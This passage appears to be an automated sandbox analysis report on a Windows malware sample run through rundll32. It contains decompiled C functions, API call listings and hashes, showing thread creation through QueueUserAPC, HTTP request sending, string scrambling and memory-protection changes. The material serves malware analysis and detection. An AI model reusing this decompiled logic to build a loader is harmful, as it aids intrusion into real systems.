                                        • Part of subcall function 00401000: memset.NTDLL ref: 0040107F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                      • String ID:
                                      • API String ID: 1632424568-0
                                      • Opcode ID: 94c43a8c686b7e126bf86f2b395185f0a28678a32bffcfbe4af60c18d2b4d7b8
                                      • Instruction ID: 105e870436915158aafb714f94c0b7d762a42eb9e761d69ac37881a28e6df3cf
                                      • Opcode Fuzzy Hash: 94c43a8c686b7e126bf86f2b395185f0a28678a32bffcfbe4af60c18d2b4d7b8
                                      • Instruction Fuzzy Hash: 90211EB1600A0AAFD711DF79DD84D6B77ECEB8434470045B6E905EB2A1E774E9048B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                      				long _v8;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				char _t9;
                                      				void* _t10;
                                      				void* _t18;
                                      				void* _t23;
                                      				void* _t36;
                                      
                                      				_push(__ecx);
                                      				_t9 = _a8;
                                      				_v8 = 1;
                                      				if(_t9 == 0) {
                                      					_t10 = InterlockedDecrement(0x404188);
                                      					__eflags = _t10;
                                      					if(_t10 == 0) {
                                      						__eflags =  *0x40418c;
                                      						if( *0x40418c != 0) {
                                      							_t36 = 0x2328;
                                      							while(1) {
                                      								SleepEx(0x64, 1);
                                      								__eflags =  *0x404198;
                                      								if( *0x404198 == 0) {
                                      									break;
                                      								}
                                      								_t36 = _t36 - 0x64;
                                      								__eflags = _t36;
                                      								if(_t36 > 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							CloseHandle( *0x40418c);
                                      						}
                                      						HeapDestroy( *0x404190);
                                      					}
                                      				} else {
                                      					if(_t9 == 1 && InterlockedIncrement(0x404188) == 1) {
                                      						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                      						 *0x404190 = _t18;
                                      						_t41 = _t18;
                                      						if(_t18 == 0) {
                                      							L6:
                                      							_v8 = 0;
                                      						} else {
                                      							 *0x4041b0 = _a4;
                                      							asm("lock xadd [eax], edi");
                                      							_push( &_a8);
                                      							_t23 = E00402009(E00401B7F, E00401EFE(_a12, 1, 0x404198, _t41));
                                      							 *0x40418c = _t23;
                                      							if(_t23 == 0) {
                                      								asm("lock xadd [esi], eax");
                                      								goto L6;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                      • InterlockedIncrement.KERNEL32(00404188), ref: 00401868
                                      • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0040187D
                                        • Part of subcall function 00402009: CreateThread.KERNEL32(00000000,00000000,00000000,?,00404198,004018B6), ref: 00402020
                                        • Part of subcall function 00402009: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00402035
                                        • Part of subcall function 00402009: GetLastError.KERNEL32(00000000), ref: 00402040
                                        • Part of subcall function 00402009: TerminateThread.KERNEL32(00000000,00000000), ref: 0040204A
                                        • Part of subcall function 00402009: CloseHandle.KERNEL32(00000000), ref: 00402051
                                        • Part of subcall function 00402009: SetLastError.KERNEL32(00000000), ref: 0040205A
                                      • InterlockedDecrement.KERNEL32(00404188), ref: 004018D0
                                      • SleepEx.KERNEL32(00000064,00000001), ref: 004018EA
                                      • CloseHandle.KERNEL32 ref: 00401906
                                      • HeapDestroy.KERNEL32 ref: 00401912
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                      • String ID:
                                      • API String ID: 2110400756-0
                                      • Opcode ID: 5f6ee9829bc5e38d0b9537be7a27de4f79759a9c147f920d0715ad7cd92f5832
                                      • Instruction ID: abfa0a05f8ce590ba779cb15af173fe24238ba7469b5255a57a393ea10d0d911
                                      • Opcode Fuzzy Hash: 5f6ee9829bc5e38d0b9537be7a27de4f79759a9c147f920d0715ad7cd92f5832
                                      • Instruction Fuzzy Hash: 2B21ABF1601205AFC710AFA9DD88A1A7BACE795761710413BFA05F72F0D6388E40DBAC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B6954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                      				void* __esi;
                                      				long _t10;
                                      				void* _t18;
                                      				void* _t22;
                                      
                                      				_t9 = __eax;
                                      				_t22 = __eax;
                                      				if(_a4 != 0) {
                                      					_t9 = E044B45C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                      					if(_t9 == 0) {
                                      						L9:
                                      						return GetLastError();
                                      					}
                                      				}
                                      				_t10 = E044B7AF1(_t9, _t18, _t22, _a8); // executed
                                      				if(_t10 == 0) {
                                      					ResetEvent( *(_t22 + 0x1c));
                                      					ResetEvent( *(_t22 + 0x20));
                                      					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                      						SetEvent( *(_t22 + 0x1c));
                                      						goto L7;
                                      					} else {
                                      						_t10 = GetLastError();
                                      						if(_t10 == 0x3e5) {
                                      							L7:
                                      							_t10 = 0;
                                      						}
                                      					}
                                      				}
                                      				if(_t10 == 0xffffffff) {
                                      					goto L9;
                                      				}
                                      				return _t10;
                                      			}

                                      APIs
                                      • ResetEvent.KERNEL32(?,00000008,?,?,00000102,044B37A0,?,?,76DC81D0,00000000), ref: 044B698E
                                      • ResetEvent.KERNEL32(?), ref: 044B6993
                                      • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 044B69A0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?,?), ref: 044B69AB
                                      • GetLastError.KERNEL32(?,?,00000102,044B37A0,?,?,76DC81D0,00000000), ref: 044B69C6
                                        • Part of subcall function 044B45C4: lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,044B6973,?,?,?,?,00000102,044B37A0,?,?,76DC81D0), ref: 044B45D0
                                        • Part of subcall function 044B45C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044B6973,?,?,?,?,00000102,044B37A0,?), ref: 044B462E
                                        • Part of subcall function 044B45C4: lstrcpy.KERNEL32(00000000,00000000), ref: 044B463E
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B69B9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3739416942-0
                                      • Opcode ID: bbabbd9aa717b95386c40f0b7e93be6488f1b41e3929e392b81972fd34cb8f2b
                                      • Instruction ID: e2a1f19d294405018504e051f694324c7fa63698ab950549b6c0cac6b2534d8e
                                      • Opcode Fuzzy Hash: bbabbd9aa717b95386c40f0b7e93be6488f1b41e3929e392b81972fd34cb8f2b
                                      • Instruction Fuzzy Hash: 08016D71104610ABEF306F71DD44F9B7AA8EF85364F15062AF691D12E0DB20F814DAF2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402009(long _a4, DWORD* _a12) {
                                      				_Unknown_base(*)()* _v0;
                                      				void* _t4;
                                      				long _t6;
                                      				long _t11;
                                      				void* _t13;
                                      
                                      				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x4041c0, 0, _a12); // executed
                                      				_t13 = _t4;
                                      				if(_t13 != 0) {
                                      					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                      					if(_t6 == 0) {
                                      						_t11 = GetLastError();
                                      						TerminateThread(_t13, _t11);
                                      						CloseHandle(_t13);
                                      						_t13 = 0;
                                      						SetLastError(_t11);
                                      					}
                                      				}
                                      				return _t13;
                                      			}









                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,00000000,?,00404198,004018B6), ref: 00402020
                                      • QueueUserAPC.KERNEL32(?,00000000,?), ref: 00402035
                                      • GetLastError.KERNEL32(00000000), ref: 00402040
                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 0040204A
                                      • CloseHandle.KERNEL32(00000000), ref: 00402051
                                      • SetLastError.KERNEL32(00000000), ref: 0040205A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                      • String ID:
                                      • API String ID: 3832013932-0
                                      • Opcode ID: bd91085eaad74993bc8c73d6488a1e5d8a6c931f1c7c4fd04b4e78363ccbead8
                                      • Instruction ID: e9a7e948bdd70d52c4fe7eb18a0cac34ca85a720d9026275d4db5b641dc0697e
                                      • Opcode Fuzzy Hash: bd91085eaad74993bc8c73d6488a1e5d8a6c931f1c7c4fd04b4e78363ccbead8
                                      • Instruction Fuzzy Hash: BAF05E32602220BBD7215FA0AE4CF5BBF6CFB08752F004524F605B01A4C7318A008B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 57%
                                      			E044B3D2C(signed int __edx) {
                                      				signed int _v8;
                                      				long _v12;
                                      				CHAR* _v16;
                                      				long _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t21;
                                      				CHAR* _t22;
                                      				CHAR* _t25;
                                      				intOrPtr _t26;
                                      				void* _t27;
                                      				void* _t31;
                                      				void* _t32;
                                      				CHAR* _t36;
                                      				CHAR* _t42;
                                      				CHAR* _t43;
                                      				CHAR* _t44;
                                      				void* _t49;
                                      				void* _t51;
                                      				signed char _t56;
                                      				intOrPtr _t58;
                                      				signed int _t59;
                                      				void* _t63;
                                      				CHAR* _t67;
                                      				CHAR* _t68;
                                      				char* _t69;
                                      				void* _t70;
                                      
                                      				_t61 = __edx;
                                      				_v20 = 0;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t21 = E044B3CFD();
                                      				if(_t21 != 0) {
                                      					_t59 =  *0x44ba2fc; // 0x4000000a
                                      					_t55 = (_t59 & 0xf0000000) + _t21;
                                      					 *0x44ba2fc = (_t59 & 0xf0000000) + _t21;
                                      				}
                                      				_t22 =  *0x44ba178(0, 2); // executed
                                      				_v16 = _t22;
                                      				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                      					_t25 = E044B389E( &_v8,  &_v20); // executed
                                      					_t54 = _t25;
                                      					_t26 =  *0x44ba348; // 0x9ad5a8
                                      					if( *0x44ba2fc > 5) {
                                      						_t8 = _t26 + 0x44bb5c5; // 0x4d283a53
                                      						_t27 = _t8;
                                      					} else {
                                      						_t7 = _t26 + 0x44bb9fd; // 0x44283a44
                                      						_t27 = _t7;
                                      					}
                                      					E044B6B80(_t27, _t27);
                                      					_t31 = E044B76BB(_t61,  &_v20,  &_v12); // executed
                                      					if(_t31 == 0) {
                                      						CloseHandle(_v20);
                                      					}
                                      					_t63 = 5;
                                      					if(_t54 != _t63) {
                                      						 *0x44ba310 =  *0x44ba310 ^ 0x81bbe65d;
                                      						_t32 = E044B6D63(0x60);
                                      						 *0x44ba3cc = _t32;
                                      						__eflags = _t32;
                                      						if(_t32 == 0) {
                                      							_push(8);
                                      							_pop(0);
                                      						} else {
                                      							memset(_t32, 0, 0x60);
                                      							_t49 =  *0x44ba3cc; // 0x4e695b0
                                      							_t70 = _t70 + 0xc;
                                      							__imp__(_t49 + 0x40);
                                      							_t51 =  *0x44ba3cc; // 0x4e695b0
                                      							 *_t51 = 0x44bb827;
                                      						}
                                      						_t54 = 0;
                                      						__eflags = 0;
                                      						if(0 == 0) {
                                      							_t36 = RtlAllocateHeap( *0x44ba2d8, 0, 0x43);
                                      							 *0x44ba368 = _t36;
                                      							__eflags = _t36;
                                      							if(_t36 == 0) {
                                      								_push(8);
                                      								_pop(0);
                                      							} else {
                                      								_t56 =  *0x44ba2fc; // 0x4000000a
                                      								_t61 = _t56 & 0x000000ff;
                                      								_t58 =  *0x44ba348; // 0x9ad5a8
                                      								_t13 = _t58 + 0x44bb552; // 0x697a6f4d
                                      								_t55 = _t13;
                                      								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x44b9287);
                                      							}
                                      							_t54 = 0;
                                      							__eflags = 0;
                                      							if(0 == 0) {
                                      								asm("sbb eax, eax");
                                      								E044B3365( ~_v8 &  *0x44ba310, 0x44ba00c); // executed
                                      								_t42 = E044B1645(0, _t55, _t63, 0x44ba00c); // executed
                                      								_t54 = _t42;
                                      								__eflags = _t54;
                                      								if(_t54 != 0) {
                                      									goto L30;
                                      								}
                                      								_t43 = E044B3981(); // executed
                                      								__eflags = _t43;
                                      								if(_t43 != 0) {
                                      									__eflags = _v8;
                                      									_t67 = _v12;
                                      									if(_v8 != 0) {
                                      										L29:
                                      										_t44 = E044B661D(_t61, _t67, _v8); // executed
                                      										_t54 = _t44;
                                      										goto L30;
                                      									}
                                      									__eflags = _t67;
                                      									if(__eflags == 0) {
                                      										goto L30;
                                      									}
                                      									_t54 = E044B529C(__eflags,  &(_t67[4]));
                                      									__eflags = _t54;
                                      									if(_t54 == 0) {
                                      										goto L30;
                                      									}
                                      									goto L29;
                                      								}
                                      								_t54 = 8;
                                      							}
                                      						}
                                      					} else {
                                      						_t68 = _v12;
                                      						if(_t68 == 0) {
                                      							L30:
                                      							if(_v16 == 0 || _v16 == 1) {
                                      								 *0x44ba17c();
                                      							}
                                      							goto L34;
                                      						}
                                      						_t69 =  &(_t68[4]);
                                      						do {
                                      						} while (E044B7928(_t63, _t69, 0, 1) == 0x4c7);
                                      					}
                                      					goto L30;
                                      				} else {
                                      					_t54 = _t22;
                                      					L34:
                                      					return _t54;
                                      				}
                                      			}
































                                      APIs
                                        • Part of subcall function 044B3CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,044B3D44,00000001), ref: 044B3D0C
                                      • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 044B3DC1
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • memset.NTDLL ref: 044B3E11
                                      • RtlInitializeCriticalSection.NTDLL(04E69570), ref: 044B3E22
                                        • Part of subcall function 044B529C: memset.NTDLL ref: 044B52B6
                                        • Part of subcall function 044B529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 044B52FC
                                        • Part of subcall function 044B529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 044B5307
                                      • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 044B3E4D
                                      • wsprintfA.USER32 ref: 044B3E7D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                      • String ID:
                                      • API String ID: 4246211962-0
                                      • Opcode ID: a01c1ddebb8438db1f8c15c18256c331055fb296a3468b26775e388e4f64f647
                                      • Instruction ID: 7340a9b290dea9adb95dbc08caa5f090bab8fd9c156a44f89680739fb1102fbb
                                      • Opcode Fuzzy Hash: a01c1ddebb8438db1f8c15c18256c331055fb296a3468b26775e388e4f64f647
                                      • Instruction Fuzzy Hash: E7519671A00225ABFF219FA6DC45AEF77A8EB04704F04481BE981E7341E775B9448BF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 22%
                                      			E044B19E2(signed int __eax, signed int _a4, signed int _a8) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				signed int _v20;
                                      				intOrPtr _t81;
                                      				char _t83;
                                      				signed int _t90;
                                      				signed int _t97;
                                      				signed int _t99;
                                      				char _t101;
                                      				unsigned int _t102;
                                      				intOrPtr _t103;
                                      				char* _t107;
                                      				signed int _t110;
                                      				signed int _t113;
                                      				signed int _t118;
                                      				signed int _t122;
                                      				intOrPtr _t124;
                                      
                                      				_t102 = _a8;
                                      				_t118 = 0;
                                      				_v20 = __eax;
                                      				_t122 = (_t102 >> 2) + 1;
                                      				_v8 = 0;
                                      				_a8 = 0;
                                      				_t81 = E044B6D63(_t122 << 2);
                                      				_v16 = _t81;
                                      				if(_t81 == 0) {
                                      					_push(8);
                                      					_pop(0);
                                      					L37:
                                      					return 0;
                                      				}
                                      				_t107 = _a4;
                                      				_a4 = _t102;
                                      				_t113 = 0;
                                      				while(1) {
                                      					_t83 =  *_t107;
                                      					if(_t83 == 0) {
                                      						break;
                                      					}
                                      					if(_t83 == 0xd || _t83 == 0xa) {
                                      						if(_t118 != 0) {
                                      							if(_t118 > _v8) {
                                      								_v8 = _t118;
                                      							}
                                      							_a8 = _a8 + 1;
                                      							_t118 = 0;
                                      						}
                                      						 *_t107 = 0;
                                      						goto L16;
                                      					} else {
                                      						if(_t118 != 0) {
                                      							L10:
                                      							_t118 = _t118 + 1;
                                      							L16:
                                      							_t107 = _t107 + 1;
                                      							_t15 =  &_a4;
                                      							 *_t15 = _a4 - 1;
                                      							if( *_t15 != 0) {
                                      								continue;
                                      							}
                                      							break;
                                      						}
                                      						if(_t113 == _t122) {
                                      							L21:
                                      							if(_a8 <= 0x20) {
                                      								_push(0xb);
                                      								L34:
                                      								_pop(0);
                                      								L35:
                                      								E044B6C2C(_v16);
                                      								goto L37;
                                      							}
                                      							_t24 = _v8 + 5; // 0xcdd8d2f8
                                      							_t103 = E044B6D63((_v8 + _t24) * _a8 + 4);
                                      							if(_t103 == 0) {
                                      								_push(8);
                                      								goto L34;
                                      							}
                                      							_t90 = _a8;
                                      							_a4 = _a4 & 0x00000000;
                                      							_v8 = _v8 & 0x00000000;
                                      							_t124 = _t103 + _t90 * 4;
                                      							if(_t90 <= 0) {
                                      								L31:
                                      								 *0x44ba318 = _t103;
                                      								goto L35;
                                      							}
                                      							do {
                                      								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                      								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                      								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                      								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                      								_v12 = _v12 & 0x00000000;
                                      								if(_a4 <= 0) {
                                      									goto L30;
                                      								} else {
                                      									goto L26;
                                      								}
                                      								while(1) {
                                      									L26:
                                      									_t99 = _v12;
                                      									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                      									if(_t99 == 0) {
                                      										break;
                                      									}
                                      									_v12 = _v12 + 1;
                                      									if(_v12 < _a4) {
                                      										continue;
                                      									}
                                      									goto L30;
                                      								}
                                      								_v8 = _v8 - 1;
                                      								L30:
                                      								_t97 = _a4;
                                      								_a4 = _a4 + 1;
                                      								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                      								__imp__(_t124);
                                      								_v8 = _v8 + 1;
                                      								_t124 = _t124 + _t97 + 1;
                                      							} while (_v8 < _a8);
                                      							goto L31;
                                      						}
                                      						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                      						_t101 = _t83;
                                      						if(_t83 - 0x61 <= 0x19) {
                                      							_t101 = _t101 - 0x20;
                                      						}
                                      						 *_t107 = _t101;
                                      						_t113 = _t113 + 1;
                                      						goto L10;
                                      					}
                                      				}
                                      				if(_t118 != 0) {
                                      					if(_t118 > _v8) {
                                      						_v8 = _t118;
                                      					}
                                      					_a8 = _a8 + 1;
                                      				}
                                      				goto L21;
                                      			}





















                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x044b1b20
                                      0x044b1b22
                                      0x044b1b25
                                      0x044b1b25
                                      0x044b1b28
                                      0x044b1b2c
                                      0x044b1b2f
                                      0x044b1b35
                                      0x044b1b38
                                      0x044b1b3f
                                      0x00000000
                                      0x044b1abb
                                      0x044b1a36
                                      0x044b1a3e
                                      0x044b1a44
                                      0x044b1a46
                                      0x044b1a46
                                      0x044b1a49
                                      0x044b1a4b
                                      0x00000000
                                      0x044b1a4b
                                      0x044b1a25
                                      0x044b1a6b
                                      0x044b1a70
                                      0x044b1a72
                                      0x044b1a72
                                      0x044b1a75
                                      0x044b1a75
                                      0x00000000

                                      APIs
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • lstrcpy.KERNEL32(69B25F45,00000020), ref: 044B1ADF
                                      • lstrcat.KERNEL32(69B25F45,00000020), ref: 044B1AF4
                                      • lstrcmp.KERNEL32(00000000,69B25F45), ref: 044B1B0B
                                      • lstrlen.KERNEL32(69B25F45), ref: 044B1B2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                      • String ID:
                                      • API String ID: 3214092121-3916222277
                                      • Opcode ID: 92bde0af5100e133a4087591ffc691481c480c0897bdc74fc11bd2bfe1e443bf
                                      • Instruction ID: b8174c5b42b030f56accd728164fb31bc371c071bd1c92f118e894d28d2f251a
                                      • Opcode Fuzzy Hash: 92bde0af5100e133a4087591ffc691481c480c0897bdc74fc11bd2bfe1e443bf
                                      • Instruction Fuzzy Hash: C151A231A04108EBDF21CF99C5946EEBBB6EF45390F15815BE8959B201D770BA51CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951031091.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_2d50000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: X
                                      • API String ID: 544645111-3081909835
                                      • Opcode ID: 6dea49ffef48e7161a3c100a3423d4f4514289b8c1cabef067fb8b0a5c0c13aa
                                      • Instruction ID: db70708f73bbb4a75a97daa97544476aa5dc17d271327944ed13e2f7ecbf246d
                                      • Opcode Fuzzy Hash: 6dea49ffef48e7161a3c100a3423d4f4514289b8c1cabef067fb8b0a5c0c13aa
                                      • Instruction Fuzzy Hash: E8B1ADB4E002288FDB68CF59C890B9DFBB1FF48314F1581AAD908AB356D775A985CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(80000002), ref: 044B755B
                                      • SysAllocString.OLEAUT32(044B3520), ref: 044B759F
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B75B3
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B75C1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID:
                                      • API String ID: 344208780-0
                                      • Opcode ID: df62541b516422819c293c9e18c37cbebcbd3159b506f1aec883b78a09c229b5
                                      • Instruction ID: 428cf64db9779470acdd256355faa577be21f0a462b1e5732101feae8b736052
                                      • Opcode Fuzzy Hash: df62541b516422819c293c9e18c37cbebcbd3159b506f1aec883b78a09c229b5
                                      • Instruction Fuzzy Hash: B031FF75900249EFDF05CF98D8809EE7BB9FF48340B10842EF94697651D774AA41CBB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E044B4B89(void* __ecx, intOrPtr _a4) {
                                      				struct _FILETIME _v12;
                                      				int _t13;
                                      				signed int _t16;
                                      				void* _t18;
                                      				signed int _t19;
                                      				unsigned int _t23;
                                      				void* _t30;
                                      				signed int _t34;
                                      
                                      				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                      				asm("stosd");
                                      				do {
                                      					_t13 = SwitchToThread();
                                      					GetSystemTimeAsFileTime( &_v12);
                                      					_t23 = _v12.dwHighDateTime;
                                      					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                      					_push(0);
                                      					_push(0x13);
                                      					_push(_t23 >> 5);
                                      					_push(_t16);
                                      					L044B83A6();
                                      					_t34 = _t16 + _t13;
                                      					_t18 = E044B5D2E(_a4, _t34);
                                      					_t30 = _t18;
                                      					_t19 = 3;
                                      					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                      				} while (_t30 == 1);
                                      				return _t30;
                                      			}












                                      APIs
                                      • SwitchToThread.KERNEL32(?,00000001,?,?,?,044B1D14,?,?), ref: 044B4B9A
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,044B1D14,?,?), ref: 044B4BA6
                                      • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 044B4BBF
                                        • Part of subcall function 044B5D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 044B5D8D
                                      • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,044B1D14,?,?), ref: 044B4BDE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
